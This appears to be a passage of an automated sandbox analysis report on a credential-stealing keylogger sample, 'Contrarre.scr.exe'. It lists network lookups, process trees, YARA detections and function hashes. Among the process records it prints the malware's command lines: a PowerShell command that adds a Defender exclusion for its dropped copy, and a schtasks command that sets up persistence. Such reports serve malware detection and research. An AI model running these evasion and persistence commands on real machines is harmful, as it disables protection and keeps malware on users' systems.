Jan 16, 2025 08:32:04.605544090 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:32:04.816498995 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:32:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49748	104.21.48.1	443	7756	C:\Users\user\Desktop\Contrarre.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:32:01 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:32:02 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:32:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327511 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Fyq4Mdl5%2FVORSiVVvWnE%2F10Qx%2BzUZRROBhpGjPgMo5dK3MLJTImazX4UrqGQhlnZf8qbo%2BCAeYLkGbCBZahH1UTd7psvBhTbxo7k4Z2mmlQCHpDqwk2z0xMr%2FRA9Bv45KRKaKCv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c68c8ce038c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1793&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1628555&cwnd=238&unsent_bytes=0&cid=13ce662a6cc604b3&ts=193&x=0"
2025-01-16 07:32:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49772	104.21.48.1	443	8076	C:\Users\user\AppData\Roaming\JkYcIYq.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:32:05 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:32:05 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:32:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327514 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxBH%2FFCoq7LpeTVgPm8BOBdM3tXbCvVSDUd7YkNsZBu0aUpypkv6bhqlkJU3qX5u6OLI9BuSxmN1kOSOTiIKmwWXGNtFTvIcnggWywU0IGelUL2ki69RPNww0kGFDjez7WXTrUVP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c68defabe43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1544&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1834170&cwnd=229&unsent_bytes=0&cid=7b0f73ab36fb3484&ts=372&x=0"
2025-01-16 07:32:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	02:31:57
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\Contrarre.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Contrarre.scr.exe"
Imagebase:	0xdd0000
File size:	752'648 bytes
MD5 hash:	AEE9DA9C20DA235642F5772A556B7CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:31:58
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:31:58
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:31:58
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp"
Imagebase:	0xd70000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:31:58
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:31:59
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\Contrarre.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Contrarre.scr.exe"
Imagebase:	0x1a0000
File size:	752'648 bytes
MD5 hash:	AEE9DA9C20DA235642F5772A556B7CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:31:59
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\Contrarre.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Contrarre.scr.exe"
Imagebase:	0x800000
File size:	752'648 bytes
MD5 hash:	AEE9DA9C20DA235642F5772A556B7CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2614011404.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	02:31:59
Start date:	16/01/2025
Path:	C:\Users\user\AppData\Roaming\JkYcIYq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JkYcIYq.exe
Imagebase:	0x3b0000
File size:	752'648 bytes
MD5 hash:	AEE9DA9C20DA235642F5772A556B7CED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:32:00
Start date:	16/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	02:32:02
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp"
Imagebase:	0xd70000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:32:02
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:32:02
Start date:	16/01/2025
Path:	C:\Users\user\AppData\Roaming\JkYcIYq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\JkYcIYq.exe"
Imagebase:	0x570000
File size:	752'648 bytes
MD5 hash:	AEE9DA9C20DA235642F5772A556B7CED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2613870891.0000000002ADB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.9%
Total number of Nodes:	325
Total number of Limit Nodes:	19

Executed Functions

Function 01853540 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%J1, xrefs: 018537DD
%J1, xrefs: 018537E4

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: %J1$%J1
API String ID: 0-994852725
Opcode ID: 9312438b4ab25a447acf7786eb44188e39b9f70f559fc6869a3134ab69f2b130
Instruction ID: 4b855eb995adc2660f6fbca2ca661800456a2f9d679450efa3eb53d2ee287a7e
Opcode Fuzzy Hash: 9312438b4ab25a447acf7786eb44188e39b9f70f559fc6869a3134ab69f2b130
Instruction Fuzzy Hash: 52C118B4D0024ADFCB54CFA5C5808AEFBB2FF89348B149559D816EB318C734AA46CF95

Function 0185348B Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

%J1, xrefs: 018537E4

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: %J1
API String ID: 0-2683891986
Opcode ID: d418d9cb48625369a17973e3f27ced5793a8290097678117b7b448b3f010dde3
Instruction ID: de7ebc7c906a47b83a2d92bc4ea610864d184040a92576500fd2a0e1cc801761
Opcode Fuzzy Hash: d418d9cb48625369a17973e3f27ced5793a8290097678117b7b448b3f010dde3
Instruction Fuzzy Hash: 75E17C70D0434ADFCB54CFA9C4809AEFBB2FF85344B1485A9D812EB259D735AA42CF91

Function 0B8B5630 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

5{, xrefs: 0B8B582A

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: cc7ddd74c78d0a26bf2f13aa9fe1549291486d8da5c69bf3ef93864cbd97c5d8
Instruction ID: 85c7a61abc49ddf3b5e85950a8f75fa620548b2ea2883589dfbefe150d8d8db8
Opcode Fuzzy Hash: cc7ddd74c78d0a26bf2f13aa9fe1549291486d8da5c69bf3ef93864cbd97c5d8
Instruction Fuzzy Hash: 05B15B74E11609CFCB04DFA9D5549EEBBB2FF89300F20846AD416AB364DB349A41CFA1

Function 01851338 Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

OKL, xrefs: 018515AB

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: OKL
API String ID: 0-250627407
Opcode ID: 5552dac892625cadfc61606842b8e4eaf46e41150a2a68bc52f9faf7ebc54e9c
Instruction ID: f6919636075fff01f6c34764457643f6012b52e4c90a2a9bbfbeb242edca3f42
Opcode Fuzzy Hash: 5552dac892625cadfc61606842b8e4eaf46e41150a2a68bc52f9faf7ebc54e9c
Instruction Fuzzy Hash: B9B10074E01209CFCB48CFA9C8846DEBBF2EF89314F24912AD815BB265E7355946CF54

Function 0B8B5640 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

5{, xrefs: 0B8B582A

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: e98ce633e4aa8709f18b4fac9d7f710de07db8ee7f22f2af606ad4486cf0a25a
Instruction ID: 2f6f31bf73532087efd3ae7e0986a7a508ca7916e6f0d153a4ab7e9426bbe85a
Opcode Fuzzy Hash: e98ce633e4aa8709f18b4fac9d7f710de07db8ee7f22f2af606ad4486cf0a25a
Instruction Fuzzy Hash: D1A14A74E11609DFCB04DFA9D5549EEBBB2FF89300F20846AD816AB364DB349A41CF61

Function 0B8B70D8 Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

j4$y, xrefs: 0B8B72FE

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: j4$y
API String ID: 0-2391584009
Opcode ID: de76a178c5ca5a23c39e32f035f3cbef6ec501b86afcf831abc08180662953e9
Instruction ID: eaf50fdc0d90ae9a48183472b8bd175129524d93045e800b1f70f70a27439ea0
Opcode Fuzzy Hash: de76a178c5ca5a23c39e32f035f3cbef6ec501b86afcf831abc08180662953e9
Instruction Fuzzy Hash: F4811474D0520AEFDB08CFA6D9809DEFBB2EB89350F10942AE525AB224D7349941CF50

Function 0B8B70E8 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

j4$y, xrefs: 0B8B72FE

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: j4$y
API String ID: 0-2391584009
Opcode ID: ab94ad8d5f5c6af7528d49c2cafbd3950b9e8f103209a3e4dfcba66b847e74a5
Instruction ID: 24ed69250e51cf1282b02a9236a806d55bc7316f542b47467ff0b90e40eed61d
Opcode Fuzzy Hash: ab94ad8d5f5c6af7528d49c2cafbd3950b9e8f103209a3e4dfcba66b847e74a5
Instruction Fuzzy Hash: 9D81F275D0520EEFDB08CFA6D9809DEFBB2AB89354F10942AE525AB324D7349942CF50

Function 018513E0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

OKL, xrefs: 018515AB

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: OKL
API String ID: 0-250627407
Opcode ID: 651bc6442f9e8146623ebd2cbe69e7b4760d67266413c75bed8c3c498892dfde
Instruction ID: ef46bf1084d04b2089b2a40db81c789ff193ec8086071e2a9d3c9ec16773ae65
Opcode Fuzzy Hash: 651bc6442f9e8146623ebd2cbe69e7b4760d67266413c75bed8c3c498892dfde
Instruction Fuzzy Hash: 6481A074E012098FDB48CFAAC58469EBBF2FB89304F24942AD815BB364D7349945CF54

Function 05726C14 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e3eb9ac819eb911d08c71ffbe27f370504e8d15a0ff5f106ce670ea2435bfc
Instruction ID: 0bb9608efaf32342ef30e0658b4d006e8f44635a33f9ea04fff719c4fb7742a5
Opcode Fuzzy Hash: d9e3eb9ac819eb911d08c71ffbe27f370504e8d15a0ff5f106ce670ea2435bfc
Instruction Fuzzy Hash: F9A18D35E103298FCB00DFA4D8949ADBBBAFF99310F158219E416AF2A5DB31A941DB50

Function 0B8B0AD0 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccaaf6d504227a6d65c7d11daf5ca131f01fae3141b909bb7ee7413313da22d8
Instruction ID: 432aad8482a79e9f376af13d1759aca70d20f0a61f59096d2ccf9ce97dd5118e
Opcode Fuzzy Hash: ccaaf6d504227a6d65c7d11daf5ca131f01fae3141b909bb7ee7413313da22d8
Instruction Fuzzy Hash: 34A1E374E01259CFDB48CFA9C894A9EFBB2FF89300F14856AD815AB365D7309906CF50

Function 05728110 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388771250.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5720000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4cc62b56e1003657442a0c00539b75482faf8a0294aab26dd88066b9279d20c
Instruction ID: 8fbb61483fb28c72e27f1deed6247e5d748ed706533574c5eb58d7a6b03a173c
Opcode Fuzzy Hash: e4cc62b56e1003657442a0c00539b75482faf8a0294aab26dd88066b9279d20c
Instruction Fuzzy Hash: B8918C35E103198FCB04DFA4D8949DDFBBAFF99310F258215E416AF2A4EB31A981DB50

Function 01859214 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630f7b53d27f07a8584921c4db64aa63f564eb4bc94ca7910914df9e97af7557
Instruction ID: 1c644caee9a05f55991476ee0ac3fde3c0a0fd361585c0d00b885c6b822dda14
Opcode Fuzzy Hash: 630f7b53d27f07a8584921c4db64aa63f564eb4bc94ca7910914df9e97af7557
Instruction Fuzzy Hash: C091A574E012198FDB44DFA9D984A9EBBF6FF89300F10916AD819EB364DB346941CF50

Function 0B8B0B70 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b231cfd38890e52de104c4c740e9449558557e8a3b8f61661e660d9a50cbaf5
Instruction ID: 5ae829173e79db5044abbc58a35abfacac6ba21a37bf931e859a024ca59edb9a
Opcode Fuzzy Hash: 1b231cfd38890e52de104c4c740e9449558557e8a3b8f61661e660d9a50cbaf5
Instruction Fuzzy Hash: 5881B074E016198FDB48CFA9C994AEEFBB2FF89300F14852AD919AB364D7349905CB50

Function 0B8B5A80 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639c53a843cdeb0632511e389ab42578c47fef357f75ad3c290bb1d309f61807
Instruction ID: e89aea709fd6c5e26af6de117500b70e04cea18455f597d4426e17b616835866
Opcode Fuzzy Hash: 639c53a843cdeb0632511e389ab42578c47fef357f75ad3c290bb1d309f61807
Instruction Fuzzy Hash: 7F51F7B4E0120A9FCB48CFA5D9959EEFBB2BB89300B14A52AD415F7364D7389A018F54

Function 0B8B5A7F Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559a32b7f9a8df22e283e57255c2f82adcaceb01b026991d68e121d8a77e8d3c
Instruction ID: e614afcb0d92ea0dd861d5426945a2d3ee14c642b5f88973da8094fd978458f5
Opcode Fuzzy Hash: 559a32b7f9a8df22e283e57255c2f82adcaceb01b026991d68e121d8a77e8d3c
Instruction Fuzzy Hash: BB51F8B4E0120A9FCB48CFA5D9959EEFBB2FB89300B14A52AD415F7364D7389A018F54

Function 0B8B5A70 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385909095914095d5e3def3a68f045c38333179898cca4a086a843f247d113d5
Instruction ID: e04126cc74e0ab6041bc05bf28669d0af91cc2158aa4fee474662b11fdfcd427
Opcode Fuzzy Hash: 385909095914095d5e3def3a68f045c38333179898cca4a086a843f247d113d5
